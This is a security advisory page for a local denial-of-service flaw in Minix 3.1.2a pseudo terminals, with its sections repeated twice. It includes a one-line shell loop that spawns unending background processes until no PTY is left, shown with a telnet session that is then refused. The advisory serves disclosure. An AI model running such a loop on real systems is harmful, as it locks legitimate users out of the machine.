Minix Psuedo Terminal Denial of Service Vulnerability
BID:30357
Info
Minix Psuedo Terminal Denial of Service Vulnerability
| Bugtraq ID: | 30357 |
| Class: | Design Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Jul 23 2008 12:00AM |
| Updated: | Jul 24 2008 02:18AM |
| Credit: | kokanin |
| Vulnerable: |
Minix Minix 3.1.2a |
| Not Vulnerable: | |
Discussion
Minix Psuedo Terminal Denial of Service Vulnerability
Minix is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to prevent users from opening new pseudo terminals, denying service to legitimate users.
Minix 3.1.2a is vulnerable; other versions may also be affected.
Minix is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to prevent users from opening new pseudo terminals, denying service to legitimate users.
Minix 3.1.2a is vulnerable; other versions may also be affected.
Exploit / POC
Minix Psuedo Terminal Denial of Service Vulnerability
An attacker can use readily available command-line utilities to exploit this issue.
The following proof of concept is available:
$ uname -a
Minix 192.168.1.2 3 1.2a i686
$ while true ; do (yes "yes yes minix uh ah"&) ; done
[snip snip]
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C
...disconnected
telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
I am sorry, but there is no free PTY left!
Connection closed by foreign host.
An attacker can use readily available command-line utilities to exploit this issue.
The following proof of concept is available:
$ uname -a
Minix 192.168.1.2 3 1.2a i686
$ while true ; do (yes "yes yes minix uh ah"&) ; done
[snip snip]
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C
...disconnected
telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
I am sorry, but there is no free PTY left!
Connection closed by foreign host.
Solution / Fix
Minix Psuedo Terminal Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].